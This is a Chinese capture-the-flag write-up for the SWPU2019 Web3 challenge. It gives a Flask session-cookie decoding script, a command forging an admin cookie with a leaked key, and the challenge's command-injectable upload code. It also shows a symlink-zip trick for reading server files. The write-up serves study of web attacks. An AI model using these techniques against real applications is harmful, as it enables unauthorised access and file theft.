![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/3-1652260588.gif "[SWPU2019]Web3-解题步骤详解")
上传有个权限,拿admin去登无果,猜测cookie伪造
![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/0-1652260592.png "[SWPU2019]Web3-解题步骤详解")
看到cookie 可以发现是jwt加密的,放到jwt官网解密无果,在网上看到p神的脚本
import sysimport zlibfrom base64 import b64decodefrom flask.sessions import session_json_serializerfrom itsdangerous import base64_decodedef decryption(payload):payload, sig = payload.rsplit(b'.', 1)payload, timestamp = payload.rsplit(b'.', 1)decompress = Falseif payload.startswith(b'.'):payload = payload[1:]decompress = Truetry:payload = base64_decode(payload)except Exception as e:raise Exception('Could not base64 decode the payload because of ''an exception')if decompress:try:payload = zlib.decompress(payload)except Exception as e:raise Exception('Could not zlib decompress the payload before ''decoding the payload')return session_json_serializer.loads(payload)if __name__ == '__main__':print(decryption(sys.argv[1].encode()))
![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/6-1652260594.png "[SWPU2019]Web3-解题步骤详解")
然后就是cookie伪造,github上有个加密脚本
加密脚本
但是加密我们需要他的私钥
之前有个破解工具,去试下
![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/1-1652260597.png "[SWPU2019]Web3-解题步骤详解")
无果,那就找他的key,这题利用到了404页面,学到了
发现访问不存在的目录时会返回key
![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/1-1652260598.png "[SWPU2019]Web3-解题步骤详解")
解密
![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/3-1652260600.png "[SWPU2019]Web3-解题步骤详解")
接着就是如何提权了
观察原来的jwt
可以发现id的值是100,而要提权,类似于linux,将id改为1,利用加密脚本,放到kali下
命令如下
注意一定要用python3的,引文靶机用的是python3
python3 flask_session_cookie_manager3.py encode -s 'keyqqqwwweee!@#$%^&*' -t "{'id': b'1', 'is_login': True, 'password': 'admin', 'username': 'admin'}"
去upload的时候抓包改cookie即可
注意着题的cookie很快就会被删除,需要每次都要更新cookie
![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/6-1652260604.png "[SWPU2019]Web3-解题步骤详解")
![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/0-1652260605.png "[SWPU2019]Web3-解题步骤详解")
查看源代码发现后端代码
![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/0-1652260607.png "[SWPU2019]Web3-解题步骤详解")
分析一波
.route('/upload',methods=['GET','POST'])def upload():if session['id'] != b'1':return render_template_string(temp)if request.method=='POST':m = hashlib.md5()name = session['password']name = name+'qweqweqwe'name = name.encode(encoding='utf-8')m.update(name)md5_one= m.hexdigest()n = hashlib.md5()ip = request.remote_addrip = ip.encode(encoding='utf-8')n.update(ip)md5_ip = n.hexdigest()f=request.files['file']basepath=os.path.dirname(os.path.realpath(__file__))path = basepath+'/upload/'+md5_ip+'/'+md5_one+'/'+session['username']+"/"path_base = basepath+'/upload/'+md5_ip+'/'filename = f.filenamepathname = path+filenameif "zip" != filename.split('.')[-1]:return 'zip only allowed'if not os.path.exists(path_base):try:os.makedirs(path_base)except Exception as e:return 'error'if not os.path.exists(path):try:os.makedirs(path)except Exception as e:return 'error'if not os.path.exists(pathname):try:f.save(pathname)except Exception as e:return 'error'try:cmd = "unzip -n -d "+path+" "+ pathnameif cmd.find('|') != -1 or cmd.find(';') != -1:waf()return 'error'os.system(cmd)except Exception as e:return 'error'unzip_file = zipfile.ZipFile(pathname,'r')unzip_filename = unzip_file.namelist()[0]if session['is_login'] != True:return 'not login'try:if unzip_filename.find('/') != -1:shutil.rmtree(path_base)os.mkdir(path_base)return 'error'image = open(path+unzip_filename, "rb").read()resp = make_response(image)resp.headers['Content-Type'] = 'image/png'return respexcept Exception as e:shutil.rmtree(path_base)os.mkdir(path_base)return 'error'return render_template('upload.html').route('/showflag')def showflag():if True == False:image = open(os.path.join('./flag/flag.jpg'), "rb").read()resp = make_response(image)resp.headers['Content-Type'] = 'image/png'return respelse:return "can't give you"
分析主要源码
大致意思就是要上传压缩过的图片,然后服务器再进行解压
这个文件上传算是第一次遇到,看了wp
思路就是上传一个软连接压缩包,来读取其他文件
另外通过源码
![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/7-1652260609.png "[SWPU2019]Web3-解题步骤详解")
可以发现flag再showflag这个路由里
linux软连接就相当于windows的快捷方式这个不难理解
去kali创建软连接,再用zip进行压缩
,因为靶机是docker起的所以要用到绝对路径
命令如下
ln -s /proc/self/cwd/flag/flag.jpg forever404zip -ry forever404.zip forever404
在进行上传
![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/0-1652260613.png "[SWPU2019]Web3-解题步骤详解")
————————————————
原文来自CSDN博主「penson by 小乌」|侵删
![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/8-1652260614.png "[SWPU2019]Web3-解题步骤详解")
![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/9-1652260616.png "[SWPU2019]Web3-解题步骤详解")
![[SWPU2019]Web3-解题步骤详解](https://cn-sec.com/wp-content/uploads/2022/05/3-1652260617.png "[SWPU2019]Web3-解题步骤详解")
![[SWPU2019]Web3-解题步骤详解](https://cn-sec.com/wp-content/uploads/2022/05/9-1652260618.png "[SWPU2019]Web3-解题步骤详解")
。想加入我们就给我们留言吧![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/9-1652260620.png "[SWPU2019]Web3-解题步骤详解")
。![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/9-1652260622.gif "[SWPU2019]Web3-解题步骤详解")
![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/2-1652260624.gif "[SWPU2019]Web3-解题步骤详解")
![[SWPU2019]Web3-解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/05/9-1652260626.png "[SWPU2019]Web3-解题步骤详解")
原文始发于微信公众号(寰宇卫士):[SWPU2019]Web3-解题步骤详解
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论